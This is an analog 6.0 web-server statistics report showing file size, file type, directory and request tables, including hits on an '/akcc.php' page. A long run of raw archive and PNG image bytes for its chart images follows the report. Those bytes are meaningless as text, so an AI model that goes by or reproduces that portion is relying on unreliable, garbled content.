class="x"> 11B- 100B</td><td class="R">50</td><td class="b"> 0.34%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">531</td><td class="b">25.79%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">306</td><td class="b">56.56%</td></tr> <tr><td class="x"> 10kB-100kB</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x">100kB- 1MB</td><td class="R">1</td><td class="b">17.31%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">592</td><td class="b">40.88%</td><td class="xl">[directories]</td></tr> <tr><td class="R">28</td><td class="b">36.00%</td><td class="xl">.php [PHP]</td></tr> <tr><td class="R">147</td><td class="b">17.06%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">40</td><td class="b"> 4.37%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">39</td><td class="b"> 1.34%</td><td class="xl">.svg</td></tr> <tr><td class="R">50</td><td class="b"> 0.34%</td><td class="xl">[no extension]</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">615</td><td class="b">76.59%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">226</td><td class="b">22.78%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">55</td><td class="b"> 0.63%</td><td class="xl">/.well-known/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p><img src="./req.png" alt="" /></p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">587</td><td class="b">40.59%</td><td class="D">Nov/30/25 9:37 PM</td><td class="xl"><a href="/">/</a></td></tr> <tr class="sub level2"><td class="R">63</td><td class="b"> 4.61%</td><td class="D">Oct/17/25 1:01 PM</td><td class="xl"> <a href="/?165.232.149.232">/?165.232.149.232</a></td></tr> <tr class="sub level2"><td class="R">26</td><td class="b"> 1.58%</td><td class="D">Nov/30/25 9:37 PM</td><td class="xl"> <a href="/?46.101.225.202">/?46.101.225.202</a></td></tr> <tr class="sub level2"><td class="R">25</td><td class="b"> 1.78%</td><td class="D">Feb/15/25 2:11 PM</td><td class="xl"> <a href="/?54.202.183.123">/?54.202.183.123</a></td></tr> <tr class="sub level2"><td class="R">12</td><td class="b"> 0.92%</td><td class="D">May/31/25 8:38 PM</td><td class="xl"> <a href="/?164.90.228.79">/?164.90.228.79</a></td></tr> <tr><td class="R">74</td><td class="b"> 2.27%</td><td class="D">Nov/ 4/25 10:04 PM</td><td class="xl">/_autoindex/assets/js/tablesort.number.js</td></tr> <tr><td class="R">73</td><td class="b">14.79%</td><td class="D">Nov/ 4/25 10:05 PM</td><td class="xl">/_autoindex/assets/js/tablesort.js</td></tr> <tr><td class="R">40</td><td class="b"> 4.37%</td><td class="D">Nov/ 4/25 10:04 PM</td><td class="xl">/_autoindex/assets/css/autoindex.css</td></tr> <tr><td class="R">33</td><td class="b"> 1.15%</td><td class="D">Aug/12/25 3:11 AM</td><td class="xl">/_autoindex/assets/icons/folder-fill.svg</td></tr> <tr><td class="R">28</td><td class="b">36.00%</td><td class="D">Aug/12/25 3:12 AM</td><td class="xl">/akcc.php</td></tr> <tr class="sub level2"><td class="R">16</td><td class="b">12.12%</td><td class="D">Aug/12/25 3:12 AM</td><td class="xl"> /akcc.php?p=</td></tr> <tr><td class="R">61</td><td class="b"> 0.83%</td><td class="D">Nov/ 4/25 10:04 PM</td><td class="xl">[not listed: 28 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> PK J�[�87r� � type.pngnu �[��� �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� IDATx��O��(�aP]UɰS;����S�dޞԸ3�i�����? z!���Dv�_�{�0��$����ޅ~�~�q�}�E�_�*-�&X?$ �K0@�`�E�"X,�B!���B�`!D�"X,�B!���B�`!D�:�Wۗ�u �k�Y�*�%嗏�����^���̅�����z}�9zu�������U ���H���kdZxXra��{kh/baq��x��THXiX���ZK�u���sМG����ʚp���7�z2�������:��&b`��D0,���5�����������zPX3+��.}����*�a(��;~ �O�/[W[�� �i�`-����-��!|\n�Zl�n ,�UZ���ck�߹����A`�bX����R𩶤��t���z(lK�x�*��>��� ` �g�#�ʹH۬Z���|�^lE` 5�1��-��j�� M��7 ֎��͇%�m��kVXX;FL�26�l�|Vވ,�^�2qn~~ho�X��`��=X��*�5�`��mb>��f�f�ք%�F��ÊV�A���-,/���)�c��.�QX���:��j++r*\� +��5,W̵��<�u��OV<��`�O�YXsW��}w�?Xq��JqxX��`I=z�L��V҅E�R��2�W��2��T��8�day>��J���a�e��iX��*��(-�UK���݅n`e\�B�7V���hغ��~V���`�K+�,a�nTe���WX9���j:+_X�Q���!X�`�]X�{&`��Z8X��ү���ZCM��o��aRbo� J��q����O ��a+������m#M���[X��"���,������?��p���=�m}3]K��^��� ���v]��Vćk��$��2�����e�,W l_�)U��gԨ�f*R��RK�[�u9 ����b+.� �8QX��U kZ,���` o��zsl�v[ �ֶ�,I<x;�Vs��b����&�,,Za9kt�+�,�Ka�/�9�Ag�.�z�&��E���EV!���i�a�кwX0��Z�P��?W<�: �r:�X�I�6�w�kY���u�چ�Z�4�����ޣ ���,`d�a�Ck�Jb�`k��sTX�5'���_�h��y�fiY-Wl��ך���h�k��D�-��-�劧F� -4�Uh�`�+�%�me�jbv`˭��pK:�[vlK�O4�?0,Hk�rd�cK��s]Ͱ�gU�(na�]h|����k��P�nv�O�,�X9�[�ڃ\ ��.*\�U�;v$Q�? by���Ʋ\��~�-+.���鋝�C�.`��?U�º�6��'C�C<�~���M�VL�`]��T���]� ,D�� �~`M>$X+��xEX��J�:�R��B�5�a�N�����aXY��Ks:k�!>�Ұ��5~�c�6�d�� ·%�T,��Xo`����q��j��ؓ�kRXJ``a��]��qJ����ۧ^�,��]`_��jV;����(�x�]VTQ`�r������LXX30b+�Zfv4�Xs�=ׅ5O�hW�����zB���а�1� ���,���A�,�Ǫ�efWmf�6��`��U-���6,�jrU��.�,oQa{j��Q��oP5`a}xW=���u7׆�(,� �� ��;��+-�E��B�pX�1���j�{�B�,�����]�*<"|��ɰ,xi���UZpvY�z��>$X��"Xw ��t�a�'Ú���5��}د���`!Jk,X�VǑUćQZ�~aHx�;��Q���ªk߇QZ�aH�]���9���.,��Q����i�}ص��ʗ��sXB+�þ#+�5�'�V߅E�0J}�o9��;wa�K��VV�u��G�u�{wa�>콰N���Ḱ�{�a�a��u��G�Uۇ��0���/��`�|86��>��9Xu}8@aea�|�b�º�&?i �,&�i=XXyX�&��X{�jM>��N���.`���.܃ULJC� �.�'���L����AL�u|E�0�u"�Ň�$ Vyj��VX XGW��X X�F|˄ X�F|˄0X>���@&�ⅴG ,�U���#��*���k��U[oc��$�Fc�U[�C�B��h��0��|B��p&D�B9q<2,�� C:�mD2,,`bLThX��[Q�WJXX�V|U ������U k�bʋr�d�*�5)�kdj�R����ai7*=��F�*���W��/��8�;�B�`!D�"X,�B!���B�`!D��|'���+���z��������!o�b���e���з��{�H?y�?_?��hA-��<l����&�QO�m�#��i��n�aL-�f7��9�6V� u_�\o� ���%ko�5k�m[ |u3[��?�Q�D��p������2��(zK���A�V��p�c] ����d�>� V���lk~5�D�q�a-6�z[Y �J�2wձ-��L����m�W�`I��j~e%`-/�,}����e#i��n�6��@���}J �o`5,ˆ�X2�{�1�3 ��s��->.ܫ��m4>�I,gC��Ҍ`����/�NU�^YQ%~ùci�(��� "X,�B!���B�`!D�"X,�B!���B��$���/$�&X�މ^��Qa��������k��ݴ�� IEND�B`�PK J�[;Q�� org.pngnu �[��� �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� �IDATx�흽r����o p��j2�*��Y�0�v�؎�ZC3df���x3�z ���?@���{1=�ۘ>bigG3��9 ~��>v!�a��ֳЎ.��?��<��7��n-�.fX�.�n$�q�BHtXxuXuXuXuXuXuXuXuXuXuXuXuXuXuXuXuXuXKT��: ��w�מ3��k�.n��ﴦi�a�K~+t�ú��ݻ���*��ݵ����`���3-:��g��u���ts��%�x�}SaLº��ki���nw��$XQX3����K�X�a���Ra��1�xX�°��D4�t3�v�D,�Ę�k#,,�U��6}������BՖz�_�S,�<,LmYXb~�8���_���P���*�BԖ�5��~��� �`�X�a�k˃�~�cũEX��*º/̀�Y ��^��r�U��P������t�$;�9X�`]><�ׁ5.~ �QV>�yX�� ZXbhV!�yX�� A���Pkõ��[B�����%GX��j~��8�X�XV��dU�Uj�,,m�Rk���bce7����i� ��!D�* ZQ�XX�+��1a,�5�^����?��8W[YX�Ua֥Ρ�%�Y�#��4V�W� �uV˰0!�a]z�� :�fR��`�rې�2�p)�`�)�[���������Yc����`����b~L*#Xc�kCd XQ �z��*,�����bV���rכ�jI ,l Ӱ)��4m�$���v`��Jk���)$�j>� ,�����Y%��I��_�: ,�XX��,�`�S��+�CK��YiXc�`%���}}�c��RX�54 ���l�TX���k�8����<,���@IX�ʊ`匕(-��ܭL1V+g���,,}|g1��_)X�Fg�gY��1]V�X�X��E�,"��w�ԆUH��`�R��*�><����O���2�����-�����éaM�>����K¢U�+��I@",��:CmXYcݿ�����X'�5iV0,ng�Ċa+˅�K���((��;� X���WV��EL�{5�R]�rhaq�As"X�� ��bgm��Љ`U�ˋ`buؐ*�Jk Y� ueX�5����aC�+ydd�U��6V����U�Q]譊`Q�}��0���X�������j�BcE#�",�\R����`��J�U�9�H1�� ��`>�.,��=Ԃ����i9�TL-�"�5,�X�Jy��Y���V�u��`ւ�㹇�a"��56�6�˦03b(�2���+���%����Z�.FUa!"�jIU`��#�a]�#x��nq#�k�����_W1�g��|�7��[B]�`��,��vW`]R"�u��UX4[e` ��Q�y�k���ā�.p�Y5���ϟ���ǖ�mha��U�4}�B`�;��f�RX�4W$�Y���- ��������Ϗ_�� �;^g1?D�pXW�����G-E̝���_M���q���"�%U�����4��W�%a���_^���zD�.�A���l�'�3�s�5[kR�0Q<kX���2[KE�W��z�����ZO�Vy�j�z��`���* k=���>���%shj�Eo�Ƈ��~���9\j�EV{�8���`)k-A�G�5�<��U%Xs����Vf��yL��*�Ti)k� f���ط;�s3,�Ce�'K*.L�|kC���Vk�ڂ����,W5a)k9A��⯃O���憗94�ri��Ⱥ����b*�g���9t��1Ĺ�2�e���V\\�Ρ��_[a���:��1o.�k���G1����N�̛U�RZ��� zQa�'���Ya�� i�1D���bx��@�a-� �h�+���vX*�����S\ �&�I+- �5�Ֆ)���`���&jKE1�{e�G �Z+�-E��ӡ,��Vk%�(�̀[� ¢�g ��X+E+��%�7<�boӡ�va�Zk%��%���G�tX�X��R�7Z�*��Ձe��V���29t�qw�Hw �Ê��{ UP�Z,����;�f)+�(�\k���|��=���$,B�<XK]k=�Sha���g����+-�Z^m�`�+�W��#��j*�Zr�Z˭��q9?S>�w��4,|i�<k� &���,�l<z�<b�4,��Xk=kM��\XB��9��;��6M�'��1˹�o#��9�2��(�Y:�Y�Cq m�V:���R��� ��U�� �� J˷���<,}C}֡��/c���9�`�9�%k+����3c� ������`�zj|#Z����BkM;���aV`�g�gO`��Y+��0�V��:,�Z{��ʡ�5��Y�)=j�;�2Ve- ��!`,���� ���aar��J��K1�.���� !�U��X�wk��1(a��,'�/%cuX_ck����F10?2$k�h���ws�R0����I�*�VVl-��Nֆ"�eX/yc�-�����`�WV1�eX*�������4,�qha9�=�ī ��B�a%K��L�R V!� ,/�/; !V6�zk��tKsd ���|c���BKEX�� `%�`,K_��sf˰r��rrXXzK�ΩqX� °��B�;X� ����*��k��U�&������ZNM)%t֤i�yax,�*�*/rC���#*$,��X�cX�0�5$a�;L���V���h kt��&$,���`XE����vG"��XxX����B-���_XX�ڊ`���r��а����u�y?��)Nb��i�� +���ZZ���@�'���DXQX���� +A ����k9�`����]����ekDž����*:,'�)X{���Xs'